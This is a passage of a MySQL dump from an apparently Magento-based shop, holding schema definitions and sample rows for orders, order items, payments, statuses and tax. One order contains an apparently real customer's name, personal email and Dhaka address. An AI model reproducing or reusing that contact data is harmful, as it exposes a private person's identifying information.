INSERT INTO `sales_order_grid` (`entity_id`, `status`, `store_id`, `store_name`, `customer_id`, `base_grand_total`, `base_total_paid`, `grand_total`, `total_paid`, `increment_id`, `base_currency_code`, `order_currency_code`, `shipping_name`, `billing_name`, `created_at`, `updated_at`, `billing_address`, `shipping_address`, `shipping_information`, `customer_email`, `customer_group`, `subtotal`, `shipping_and_handling`, `customer_name`, `payment_method`, `total_refunded`, `signifyd_guarantee_status`) VALUES
(1, 'processing', 1, 'Main Website\nMain Website Store\nDefault Store View', 1, 36.3900, 36.3900, 36.3900, 36.3900, '000000001', 'BDT', 'BDT', 'Veronica Costello', 'Veronica Costello', '2020-08-08 01:45:18', '2020-08-08 01:45:20', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Flat Rate - Fixed', 'roni_cost@example.com', '1', 29.0000, 5.0000, 'Veronica Costello', 'checkmo', NULL, NULL),
(2, 'closed', 1, 'Main Website\nMain Website Store\nDefault Store View', 1, 39.6400, 39.6400, 39.6400, 39.6400, '000000002', 'BDT', 'BDT', 'Veronica Costello', 'Veronica Costello', '2020-08-08 01:45:23', '2020-08-08 01:45:27', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', '6146 Honey Bluff Parkway,Calder,Michigan,49628-7978', 'Flat Rate - Fixed', 'roni_cost@example.com', '1', 32.0000, 5.0000, 'Veronica Costello', 'checkmo', 39.6400, NULL),
(3, 'pending', 1, 'Main Website\nMain Website Store\nDefault Store View', NULL, 192.2000, NULL, 192.2000, NULL, '000000003', 'BDT', 'BDT', 'Sudip Dhali', 'Sudip Dhali', '2020-08-23 05:43:23', '2020-08-23 05:43:23', 'abc,Naya Paltan,Dhaka,1000', 'abc,Naya Paltan,Dhaka,1000', 'Flat Rate - Fixed', 'sudipjeet.cse@gmail.com', '0', 234.0000, 5.0000, 'Sudip Dhali', 'checkmo', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_item`
--

CREATE TABLE `sales_order_item` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Item ID',
  `order_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Order ID',
  `parent_item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent Item ID',
  `quote_item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Quote Item ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `product_type` varchar(255) DEFAULT NULL COMMENT 'Product Type',
  `product_options` text DEFAULT NULL COMMENT 'Product Options',
  `weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Weight',
  `is_virtual` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Virtual',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `applied_rule_ids` text DEFAULT NULL COMMENT 'Applied Rule Ids',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `is_qty_decimal` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Qty Decimal',
  `no_discount` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'No Discount',
  `qty_backordered` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Backordered',
  `qty_canceled` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Canceled',
  `qty_invoiced` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Invoiced',
  `qty_ordered` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Ordered',
  `qty_refunded` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Refunded',
  `qty_shipped` decimal(12,4) DEFAULT 0.0000 COMMENT 'Qty Shipped',
  `base_cost` decimal(12,4) DEFAULT 0.0000 COMMENT 'Base Cost',
  `price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Price',
  `base_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Price',
  `original_price` decimal(12,4) DEFAULT NULL COMMENT 'Original Price',
  `base_original_price` decimal(12,4) DEFAULT NULL COMMENT 'Base Original Price',
  `tax_percent` decimal(12,4) DEFAULT 0.0000 COMMENT 'Tax Percent',
  `tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Tax Amount',
  `base_tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Tax Amount',
  `tax_invoiced` decimal(20,4) DEFAULT 0.0000 COMMENT 'Tax Invoiced',
  `base_tax_invoiced` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Tax Invoiced',
  `discount_percent` decimal(12,4) DEFAULT 0.0000 COMMENT 'Discount Percent',
  `discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Discount Amount',
  `base_discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Discount Amount',
  `discount_invoiced` decimal(20,4) DEFAULT 0.0000 COMMENT 'Discount Invoiced',
  `base_discount_invoiced` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Discount Invoiced',
  `amount_refunded` decimal(20,4) DEFAULT 0.0000 COMMENT 'Amount Refunded',
  `base_amount_refunded` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Amount Refunded',
  `row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Row Total',
  `base_row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Row Total',
  `row_invoiced` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Row Invoiced',
  `base_row_invoiced` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Row Invoiced',
  `row_weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Row Weight',
  `base_tax_before_discount` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Before Discount',
  `tax_before_discount` decimal(20,4) DEFAULT NULL COMMENT 'Tax Before Discount',
  `ext_order_item_id` varchar(255) DEFAULT NULL COMMENT 'Ext Order Item ID',
  `locked_do_invoice` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Locked Do Invoice',
  `locked_do_ship` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Locked Do Ship',
  `price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Price Incl Tax',
  `base_price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Price Incl Tax',
  `row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Row Total Incl Tax',
  `base_row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Row Total Incl Tax',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `discount_tax_compensation_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Invoiced',
  `base_discount_tax_compensation_invoiced` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Invoiced',
  `discount_tax_compensation_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Refunded',
  `base_discount_tax_compensation_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Refunded',
  `tax_canceled` decimal(12,4) DEFAULT NULL COMMENT 'Tax Canceled',
  `discount_tax_compensation_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Canceled',
  `tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Tax Refunded',
  `base_tax_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Refunded',
  `discount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Discount Refunded',
  `base_discount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Refunded',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `gift_message_available` int(11) DEFAULT NULL COMMENT 'Gift Message Available',
  `free_shipping` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Free Shipping',
  `weee_tax_applied` text DEFAULT NULL COMMENT 'Weee Tax Applied',
  `weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Amount',
  `weee_tax_applied_row_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Row Amount',
  `weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Disposition',
  `weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Row Disposition',
  `base_weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Amount',
  `base_weee_tax_applied_row_amnt` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Row Amnt',
  `base_weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Disposition',
  `base_weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Row Disposition'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Item';

--
-- Dumping data for table `sales_order_item`
--

INSERT INTO `sales_order_item` (`item_id`, `order_id`, `parent_item_id`, `quote_item_id`, `store_id`, `created_at`, `updated_at`, `product_id`, `product_type`, `product_options`, `weight`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `qty_backordered`, `qty_canceled`, `qty_invoiced`, `qty_ordered`, `qty_refunded`, `qty_shipped`, `base_cost`, `price`, `base_price`, `original_price`, `base_original_price`, `tax_percent`, `tax_amount`, `base_tax_amount`, `tax_invoiced`, `base_tax_invoiced`, `discount_percent`, `discount_amount`, `base_discount_amount`, `discount_invoiced`, `base_discount_invoiced`, `amount_refunded`, `base_amount_refunded`, `row_total`, `base_row_total`, `row_invoiced`, `base_row_invoiced`, `row_weight`, `base_tax_before_discount`, `tax_before_discount`, `ext_order_item_id`, `locked_do_invoice`, `locked_do_ship`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `discount_tax_compensation_invoiced`, `base_discount_tax_compensation_invoiced`, `discount_tax_compensation_refunded`, `base_discount_tax_compensation_refunded`, `tax_canceled`, `discount_tax_compensation_canceled`, `tax_refunded`, `base_tax_refunded`, `discount_refunded`, `base_discount_refunded`, `gift_message_id`, `gift_message_available`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(1, 1, NULL, NULL, 1, '2020-08-08 01:45:18', '2020-08-08 01:45:20', 1441, 'configurable', '{\"info_buyRequest\":{\"qty\":1,\"super_attribute\":{\"145\":\"5593\",\"93\":\"5485\"},\"options\":[]},\"attributes_info\":[{\"label\":\"Size\",\"value\":\"XS\",\"option_id\":145,\"option_value\":\"5593\"},{\"label\":\"Color\",\"value\":\"Red\",\"option_id\":93,\"option_value\":\"5485\"}],\"simple_name\":\"Iris Workout Top-XS-Red\",\"simple_sku\":\"WS03-XS-Red\",\"product_calculations\":1,\"shipment_type\":0}', 1.0000, NULL, 'WS03-XS-Red', 'Iris Workout Top', NULL, '1', NULL, 0, 0, NULL, 0.0000, 1.0000, 1.0000, 0.0000, 1.0000, NULL, 29.0000, 29.0000, 29.0000, 29.0000, 8.2500, 2.3900, 2.3900, 2.3900, 2.3900, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 29.0000, 29.0000, 29.0000, 29.0000, 1.0000, NULL, NULL, NULL, NULL, NULL, 31.3900, 31.3900, 31.3900, 31.3900, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(2, 2, NULL, NULL, 1, '2020-08-08 01:45:23', '2020-08-08 01:45:27', 1505, 'configurable', '{\"info_buyRequest\":{\"qty\":\"1.0000\",\"super_attribute\":{\"145\":\"5593\",\"93\":\"5477\"}},\"attributes_info\":[{\"label\":\"Size\",\"value\":\"XS\",\"option_id\":145,\"option_value\":\"5593\"},{\"label\":\"Color\",\"value\":\"Blue\",\"option_id\":93,\"option_value\":\"5477\"}],\"simple_name\":\"Minerva LumaTech&trade; V-Tee-XS-Blue\",\"simple_sku\":\"WS08-XS-Blue\",\"product_calculations\":1,\"shipment_type\":0}', 1.0000, NULL, 'WS08-XS-Blue', 'Minerva LumaTech&trade; V-Tee', NULL, '1', NULL, 0, 0, NULL, 0.0000, 1.0000, 1.0000, 1.0000, 1.0000, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 8.2500, 2.6400, 2.6400, 2.6400, 2.6400, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 32.0000, 32.0000, 1.0000, NULL, NULL, NULL, NULL, NULL, 34.6400, 34.6400, 34.6400, 34.6400, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, 2.6400, 2.6400, 0.0000, 0.0000, NULL, NULL, 0, '[]', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(3, 3, NULL, 9, 1, '2020-08-23 05:43:23', '2020-08-23 05:43:23', 2062, 'simple', '{\"info_buyRequest\":{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95L2Nvc21ldGljcy5odG1s\",\"product\":\"2062\",\"qty\":1}}', 1.0000, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, NULL, 0.0000, 0.0000, 1.0000, 0.0000, 0.0000, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_payment`
--

CREATE TABLE `sales_order_payment` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `base_shipping_captured` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Captured',
  `shipping_captured` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Captured',
  `amount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Amount Refunded',
  `base_amount_paid` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Paid',
  `amount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Amount Canceled',
  `base_amount_authorized` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Authorized',
  `base_amount_paid_online` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Paid Online',
  `base_amount_refunded_online` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Refunded Online',
  `base_shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Amount',
  `shipping_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Amount',
  `amount_paid` decimal(20,4) DEFAULT NULL COMMENT 'Amount Paid',
  `amount_authorized` decimal(20,4) DEFAULT NULL COMMENT 'Amount Authorized',
  `base_amount_ordered` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Ordered',
  `base_shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Refunded',
  `shipping_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Refunded',
  `base_amount_refunded` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Refunded',
  `amount_ordered` decimal(20,4) DEFAULT NULL COMMENT 'Amount Ordered',
  `base_amount_canceled` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount Canceled',
  `quote_payment_id` int(11) DEFAULT NULL COMMENT 'Quote Payment ID',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `cc_exp_month` varchar(12) DEFAULT NULL COMMENT 'Cc Exp Month',
  `cc_ss_start_year` varchar(12) DEFAULT NULL COMMENT 'Cc Ss Start Year',
  `echeck_bank_name` varchar(128) DEFAULT NULL COMMENT 'Echeck Bank Name',
  `method` varchar(128) DEFAULT NULL COMMENT 'Method',
  `cc_debug_request_body` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Request Body',
  `cc_secure_verify` varchar(32) DEFAULT NULL COMMENT 'Cc Secure Verify',
  `protection_eligibility` varchar(32) DEFAULT NULL COMMENT 'Protection Eligibility',
  `cc_approval` varchar(32) DEFAULT NULL COMMENT 'Cc Approval',
  `cc_last_4` varchar(100) DEFAULT NULL COMMENT 'Cc Last 4',
  `cc_status_description` varchar(32) DEFAULT NULL COMMENT 'Cc Status Description',
  `echeck_type` varchar(32) DEFAULT NULL COMMENT 'Echeck Type',
  `cc_debug_response_serialized` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Response Serialized',
  `cc_ss_start_month` varchar(128) DEFAULT NULL COMMENT 'Cc Ss Start Month',
  `echeck_account_type` varchar(255) DEFAULT NULL COMMENT 'Echeck Account Type',
  `last_trans_id` varchar(255) DEFAULT NULL COMMENT 'Last Trans ID',
  `cc_cid_status` varchar(32) DEFAULT NULL COMMENT 'Cc Cid Status',
  `cc_owner` varchar(128) DEFAULT NULL COMMENT 'Cc Owner',
  `cc_type` varchar(32) DEFAULT NULL COMMENT 'Cc Type',
  `po_number` varchar(32) DEFAULT NULL COMMENT 'Po Number',
  `cc_exp_year` varchar(4) DEFAULT NULL COMMENT 'Cc Exp Year',
  `cc_status` varchar(4) DEFAULT NULL COMMENT 'Cc Status',
  `echeck_routing_number` varchar(32) DEFAULT NULL COMMENT 'Echeck Routing Number',
  `account_status` varchar(32) DEFAULT NULL COMMENT 'Account Status',
  `anet_trans_method` varchar(32) DEFAULT NULL COMMENT 'Anet Trans Method',
  `cc_debug_response_body` varchar(32) DEFAULT NULL COMMENT 'Cc Debug Response Body',
  `cc_ss_issue` varchar(32) DEFAULT NULL COMMENT 'Cc Ss Issue',
  `echeck_account_name` varchar(32) DEFAULT NULL COMMENT 'Echeck Account Name',
  `cc_avs_status` varchar(32) DEFAULT NULL COMMENT 'Cc Avs Status',
  `cc_number_enc` varchar(128) DEFAULT NULL,
  `cc_trans_id` varchar(32) DEFAULT NULL COMMENT 'Cc Trans ID',
  `address_status` varchar(32) DEFAULT NULL COMMENT 'Address Status',
  `additional_information` text DEFAULT NULL COMMENT 'Additional Information'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Payment';

--
-- Dumping data for table `sales_order_payment`
--

INSERT INTO `sales_order_payment` (`entity_id`, `parent_id`, `base_shipping_captured`, `shipping_captured`, `amount_refunded`, `base_amount_paid`, `amount_canceled`, `base_amount_authorized`, `base_amount_paid_online`, `base_amount_refunded_online`, `base_shipping_amount`, `shipping_amount`, `amount_paid`, `amount_authorized`, `base_amount_ordered`, `base_shipping_refunded`, `shipping_refunded`, `base_amount_refunded`, `amount_ordered`, `base_amount_canceled`, `quote_payment_id`, `additional_data`, `cc_exp_month`, `cc_ss_start_year`, `echeck_bank_name`, `method`, `cc_debug_request_body`, `cc_secure_verify`, `protection_eligibility`, `cc_approval`, `cc_last_4`, `cc_status_description`, `echeck_type`, `cc_debug_response_serialized`, `cc_ss_start_month`, `echeck_account_type`, `last_trans_id`, `cc_cid_status`, `cc_owner`, `cc_type`, `po_number`, `cc_exp_year`, `cc_status`, `echeck_routing_number`, `account_status`, `anet_trans_method`, `cc_debug_response_body`, `cc_ss_issue`, `echeck_account_name`, `cc_avs_status`, `cc_number_enc`, `cc_trans_id`, `address_status`, `additional_information`) VALUES
(1, 1, 5.0000, 5.0000, NULL, 36.3900, NULL, NULL, NULL, NULL, 5.0000, 5.0000, 36.3900, NULL, 36.3900, NULL, NULL, NULL, 36.3900, NULL, NULL, NULL, NULL, NULL, NULL, 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '{\"method_title\":\"Check \\/ Money order\"}'),
(2, 2, 5.0000, 5.0000, 39.6400, 39.6400, NULL, NULL, NULL, NULL, 5.0000, 5.0000, 39.6400, NULL, 39.6400, 5.0000, 5.0000, 39.6400, 39.6400, NULL, NULL, NULL, NULL, NULL, NULL, 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '{\"method_title\":\"Check \\/ Money order\"}'),
(3, 3, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 5.0000, 5.0000, NULL, NULL, 192.2000, NULL, NULL, NULL, 192.2000, NULL, NULL, NULL, NULL, '0', NULL, 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '{\"method_title\":\"Check \\/ Money order\"}');

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_status`
--

CREATE TABLE `sales_order_status` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `label` varchar(128) NOT NULL COMMENT 'Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Table';

--
-- Dumping data for table `sales_order_status`
--

INSERT INTO `sales_order_status` (`status`, `label`) VALUES
('canceled', 'Canceled'),
('closed', 'Closed'),
('complete', 'Complete'),
('fraud', 'Suspected Fraud'),
('holded', 'On Hold'),
('payment_review', 'Payment Review'),
('paypal_canceled_reversal', 'PayPal Canceled Reversal'),
('paypal_reversed', 'PayPal Reversed'),
('pending', 'Pending'),
('pending_payment', 'Pending Payment'),
('pending_paypal', 'Pending PayPal'),
('processing', 'Processing');

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_status_history`
--

CREATE TABLE `sales_order_status_history` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` int(11) DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `status` varchar(32) DEFAULT NULL COMMENT 'Status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `entity_name` varchar(32) DEFAULT NULL COMMENT 'Shows what entity history is bind to.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Status History';

--
-- Dumping data for table `sales_order_status_history`
--

INSERT INTO `sales_order_status_history` (`entity_id`, `parent_id`, `is_customer_notified`, `is_visible_on_front`, `comment`, `status`, `created_at`, `entity_name`) VALUES
(1, 2, 1, 0, 'We refunded ৳39.64 offline.', 'closed', '2020-08-08 01:45:27', 'creditmemo');

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_status_label`
--

CREATE TABLE `sales_order_status_label` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `label` varchar(128) NOT NULL COMMENT 'Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Label Table';

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_status_state`
--

CREATE TABLE `sales_order_status_state` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `state` varchar(32) NOT NULL COMMENT 'Label',
  `is_default` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Default',
  `visible_on_front` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Visible on front'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Table';

--
-- Dumping data for table `sales_order_status_state`
--

INSERT INTO `sales_order_status_state` (`status`, `state`, `is_default`, `visible_on_front`) VALUES
('canceled', 'canceled', 1, 1),
('closed', 'closed', 1, 1),
('complete', 'complete', 1, 1),
('fraud', 'payment_review', 0, 1),
('fraud', 'processing', 0, 1),
('holded', 'holded', 1, 1),
('payment_review', 'payment_review', 1, 1),
('pending', 'new', 1, 1),
('pending_payment', 'pending_payment', 1, 0),
('processing', 'processing', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_tax`
--

CREATE TABLE `sales_order_tax` (
  `tax_id` int(10) UNSIGNED NOT NULL COMMENT 'Tax ID',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `percent` decimal(12,4) DEFAULT NULL COMMENT 'Percent',
  `amount` decimal(20,4) DEFAULT NULL COMMENT 'Amount',
  `priority` int(11) NOT NULL COMMENT 'Priority',
  `position` int(11) NOT NULL COMMENT 'Position',
  `base_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount',
  `process` smallint(6) NOT NULL COMMENT 'Process',
  `base_real_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Real Amount'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Tax Table';

--
-- Dumping data for table `sales_order_tax`
--

INSERT INTO `sales_order_tax` (`tax_id`, `order_id`, `code`, `title`, `percent`, `amount`, `priority`, `position`, `base_amount`, `process`, `base_real_amount`) VALUES
(1, 1, 'US-MI-*-Rate 1', 'US-MI-*-Rate 1', 8.2500, 2.3900, 0, 0, 2.3900, 0, 2.3900),
(2, 2, 'US-MI-*-Rate 1', 'US-MI-*-Rate 1', 8.2500, 2.6400, 0, 0, 2.6400, 0, 2.6400);

-- --------------------------------------------------------

--
-- Table structure for table `sales_order_tax_item`
--

CREATE TABLE `sales_order_tax_item` (
  `tax_item_id` int(10) UNSIGNED NOT NULL COMMENT 'Tax Item ID',
  `tax_id` int(10) UNSIGNED NOT NULL COMMENT 'Tax ID',
  `item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Item ID',
  `tax_percent` decimal(12,4) NOT NULL COMMENT 'Real Tax Percent For Item',
  `amount` decimal(20,4) NOT NULL COMMENT 'Tax amount for the item and tax rate',
  `base_amount` decimal(20,4) NOT NULL COMMENT 'Base tax amount for the item and tax rate',
  `real_amount` decimal(20,4) NOT NULL COMMENT 'Real tax amount for the item and tax rate',
  `real_base_amount` decimal(20,4) NOT NULL COMMENT 'Real base tax amount for the item and tax rate',
  `associated_item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Id of the associated item',
  `taxable_item_type` varchar(32) NOT NULL COMMENT 'Type of the taxable item'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Tax Item';

--
-- Dumping data for table `sales_order_tax_item`
--

INSERT INTO `sales_order_tax_item` (`tax_item_id`, `tax_id`, `item_id`, `tax_percent`, `amount`, `base_amount`, `real_amount`, `real_base_amount`, `associated_item_id`, `taxable_item_type`) VALUES
(1, 1, NULL, 8.2500, 2.3900, 2.3900, 2.3900, 2.3900, NULL, 'product'),
(2, 2, NULL, 8.2500, 2.6400, 2.6400, 2.6400, 2.6400, NULL, 'product');

-- --------------------------------------------------------

--
-- Table structure for table `sales_payment_transaction`
--

CREATE TABLE `sales_payment_transaction` (
  `transaction_id` int(10) UNSIGNED NOT NULL COMMENT 'Transaction ID',
  `parent_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent ID',
  `order_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Order ID',
  `payment_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Payment ID',
  `txn_id` varchar(100) DEFAULT NULL COMMENT 'Txn ID',
  `parent_txn_id` varchar(100) DEFAULT NULL COMMENT 'Parent Txn ID',
  `txn_type` varchar(15) DEFAULT NULL COMMENT 'Txn Type',
  `is_closed` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Closed',
  `additional_information` blob DEFAULT NULL COMMENT 'Additional Information',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Payment Transaction';

-- --------------------------------------------------------

--
-- Table structure for table `sales_refunded_aggregated`
--

CREATE TABLE `sales_refunded_aggregated` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'ID',
  `period` date DEFAULT NULL COMMENT 'Period',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `order_status` varchar(50) NOT NULL COMMENT 'Order Status',
  `orders_count` int(11) NOT NULL DEFAULT 0 COMMENT 'Orders Count',
